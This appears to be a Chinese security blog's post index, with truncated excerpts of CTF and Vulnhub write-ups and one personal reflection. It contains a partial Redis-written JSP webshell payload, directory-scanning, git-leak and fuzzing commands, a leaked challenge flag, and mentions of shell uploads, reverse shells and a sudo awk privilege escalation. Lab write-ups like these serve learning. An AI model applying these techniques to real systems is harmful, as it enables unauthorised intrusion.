c0ll4r

background：线下 断网 收手机 天气很热 图书馆里300号人就4台空调 我们头顶上的风扇还是坏的 打到后面我真的感觉人都要缺氧虚脱了 志愿者们也很辛苦 感谢承办院校与志愿者的辛勤付出 总的来说成绩还是很不错的 可是赛后知道fix有非预期方法 绷不住了 我fix1是用尽最后一次的次数才通的 web-login没啥说的 很基础的题(差点没出 都50分了才出的 一开始只爆了admin的密码 尝试了password8000 结果是除了admin 任意用户+密码123456就能成功) 参考https://blog.pwns.fun/2023/12/08/jwt%E4%BC%AA%E9%80%A0/?highlight=jwt#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3 爆破出密钥再签名就行了 webshell不是我做的 看着不是很难 感觉挺基础的 不过最后结束了还有90多分 我们这队绿盟的高工还拿的三血 上来就给我说是webshell 我就给他内网传了个abc123的应急工具箱 然后他看了一下就拿到了elf文件的base64问我怎么变回去 我说试试Win ...

参考： https://mp.weixin.qq.com/s/ER6s48ipu1CXdCoezvR0aA 本质： Redis在写长文本的情况下遇到的乱码问题 源于去年某次攻防实战 当时数据量很大 整个redis里有百把兆数据 搞了很久因为jsp的shell很长 老手法写访问就是500 数据里面自带的脏字符会和shell冲突 所以不管怎么样 先备份数据 然后清空再写shell（数据量很大的话） 写完shell再恢复数据 poc1 set x '*/byte[] b = new byte[2048];/*'set x2 '*/out.print("<pre>");/*'set x3 '*/out.print("</pre>");}%>'set x4 '*/request.getParameter("i")).getInputStream();/*'set x5 '/r/n/r/n<% if ( ...

时隔两年半 再战 想看看自己到底成长了多少 flag_640 flag_641 新路径 flag_642 flag_643https://5fbf6c41-3851-4727-a2b2-98842438e48a.challenge.ctf.show/system36d/secret.txt ctfshow{616cd5fc37968fc20810b2db30152717} flag_644 flag_645数据备份导出 然后没思路了 看了下wp 结果实战这里执行ls 但我感觉这个点位并不是真的在执行命令 而是提前设置好的 还是更新的这个点 我思路一直是ssrf(昨天客户现场刚出了ssrf )实际上我已经用这里读了127.0.0.1并且有回显了 但我没想到他也可能是file_get_contens 简单看了wp 放弃 感觉太难了 抽空再站

background五一来了，这是我专科生活的最后一年，四年的专科生活即将结束。十年前的今天，我还在上六年级，几个同学一起去给老师过生日。十年已过，时间，真快！写下此文是源于刷到了某篇让我共情的东西。 忆往昔用一些词来形容以前的自己(20年以前吧)该用什么好呢？ 我依稀记得辛巴说的一句话，大概内容是”学习成绩差，学习烂，生活烂，现实中的什么都烂”。我觉得这就是我以前最真实的写照了。家庭条件差，导致现实生活中不得意，还做了很多傻逼的事情，用一个谎言去圆另一个谎言，一直这样下去。但是上天似乎也一直很照顾我，给了我学物理的一些基础天赋让我物理基本上能拿满分，给了我动手的一些天赋，让我参加科技创新比赛拿到了一些奖项。我想正是由于这些天赋让我能够拿到一些鲜花与掌声，这对我一个内心世界空虚的人来说，这是最需要的东西。别人赞赏与佩服的目光，自己“高高在上”的样子真的很爽。我也是这样迷失了自我，于是不断的编造一些事情来让大家继续佩服与赞赏。 这样做，我伤害了一些人，一些信任我的朋友，还有那时候自己喜欢的女孩。为什么说20年以前呢？我很感谢geekpwn，他给了我“重生“的一次机会。 当我去到geekp ...

background：之前学过一段时间的内网 但是现在什么都忘了 能记得的只有密码复用了 废了 感觉还是学习方法出了问题 还是得做大量的靶机才能记住一些东西 而不是一个靶机环境去学各种手法 那先直接硬撸一遍红日3 官网http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 打点数据库弱口令 udf失败 joomla的系统 那就改密码进后台 使用的是password_hash函数做的加密 生成一个替换就行了 然后 <?php$password = "1";$hashedPassword = password_hash($password, PASSWORD_DEFAULT);echo $hashedPassword;?>//$2y$10$jcHdCA2vFJPhhaLW46hsUerpCqqbogmwFTxuIiM1vfF/HamalGx5S 进了后台之后改模板getshell 参考 https://cloud.tencent.com/developer/article/2378001 不能执行命 ...

background学到了很多东西 这个靶机是我目前这段时间做过的最有意思的一个了 打点开了个80和5000 80这不知道是什么东西 5000啥也没有 22端口可以匿名访问 尝试了下没有生成文件的权限，ftp里对应的文件也不是web目录的 文件执行就是这个样子 没有可用信息 逆一下 这堆insert不知道是干什么的 可以看到对应的字符 得/sh*4d0w$s 两个端口拼接了路径访问都没东西 在伪代码里直接转成char 得/sh4d0w$s 访问5000端口有反应 提示我们需要参数 测了下不支持post参数 上了我有的所有字典 都找不到参数 到这里就无解了 后面都是看了wp的 因为提权也确实提不动(没用系统漏洞 21年的靶机拿22年的cve提 没啥意义 重点是学习) 实际上80端口的提示就是参数的提示 组成和长度啥的都是leet语里面的 使用crunch可生成字典文件 crunch 6 6 1337leet > cs.txt 然后使用ffuz去fuzz 第一次用ffuz 真的好用啊 下次实战就用他了 这里参数错误的提示Size是8 所 ...

background：自己独立完成的第一个hard级别的靶机 难度其实都不大 跟三年前的一样 只不过是自己拥有了独立思考到解题的一个过程 更多的也是一直经验 https://www.vulnhub.com/entry/darkhole-2,740/ 口子做个目录扫描发现了.git文件泄露 并且还有目录浏览 http://192.168.0.130/.git/ 那就直接上githack python2 GitHack.py http://192.168.0.130/.git/ login.php.php里没有有用的信息 dashboard.php里是goto加密了 https://enphp.djunny.com/ 在线解goto加密 解开感觉就出货了 很明显的一个注入 moblie直接拼接了 直接构造数据包却发现不行 源码里面也没有输出Not Allowed的逻辑啊 那就只能证明我们拿到的源码不是当下的业务代码 查看一下git修改记录 git log 查看修改的内容 最终发现上一个版本的代码中直接写了账号密码 git diff a4d900a8d85e893 ...

background就是个脑洞题目 上来扫目录 主要找html后缀 gobuster dir -u http://192.168.1.5/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php .html 得到http://192.168.1.5/exploit.html 把里面的localhost地址改了传文件就行 能得到一半flag http://192.168.1.5/enter_network/ 这里不知道怎么来的 大家都不知道 然后就是登录框注入出全部flag。或者这里改cookie得到另一半flag 测试了下写shell的可行性 不太行 /var/www/html没有写入权限 只能写入/tmp 没啥用 POST /enter_network/index.php HTTP/1.1Host: 192.168.1.5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135. ...

background：随便找了个靶机 主要是他小 其他有的靶机是真的大 这个难度是简单 确实简单 没啥说的 这个靶机里面还包含了个靶机 口子那个洞出了点问题 别人写的exp我看不懂 看着像老外写的 直接用根本用不了 后面就去看wp了 其实不用exp 直接上传php文件就行了 应该是口子不一样吧 然后我这里用了个新的方法 网上我没看到有 但估计是靶场本身留下来的 fofa搜了一圈发现不是通用的。 getshell上来就是这个 qdPM 9.1 searchspoit导出的都有问题 跑不动 这题关键是要有账号密码 网上的方法都是在secert目录下找个图片解隐写的 其实可以不用这样 访问install就能重装 填自己的数据库就行了 会让你自己设置密码 登录之后加个用户就行了 用添加出来的用户进行getshell 更新头像处直接上马就行 http://192.168.1.5/uploads/users/ 目录遍历读文件 提权朴实无华的suid 交互式shell进新的shell 然后反弹即可 sudo awk 'BEGIN {system(&quo ...

background:寒假这个月基本都是在休息，也没做啥事情。突发奇想就想做做vulnhub，以前都是看着wp做的，想试试自己独立思考的过程。现在看自己四年前vulbhub的笔记，当时都是不能知其所以然，随着后面实战项目越来越多自己的各方面能力都能得到提升。才能了解这个逻辑。 所以这次就想看看自己水平到底怎么样了，哪知道下的这个靶场是nodejs的，我第一次接触，没办法不会做的又看了wp。https://www.vulnhub.com/entry/chronos-1,735/ 自己的成果都配置好hosts解析了，一开始想试试nodejs反序列化的，后来发现了口子是base58编码，一直以为这里是nodejs格式化字符串的漏洞。需要拼接nodejs代码实现rce，没想到就是朴实无华的exec。我真没看出来，要是我能看出来那段字符串是date命令的话，也许结果就不一样了。 漏洞点直接访问没东西 看到js了这个请求地址 所以就想到改hosts 比较有意思的一点就是谷歌浏览器里面访问不了 得去火狐里面 后面看了源码知道是限制了user-agent。需要是Chronos才行，我感觉应该是谷歌 ...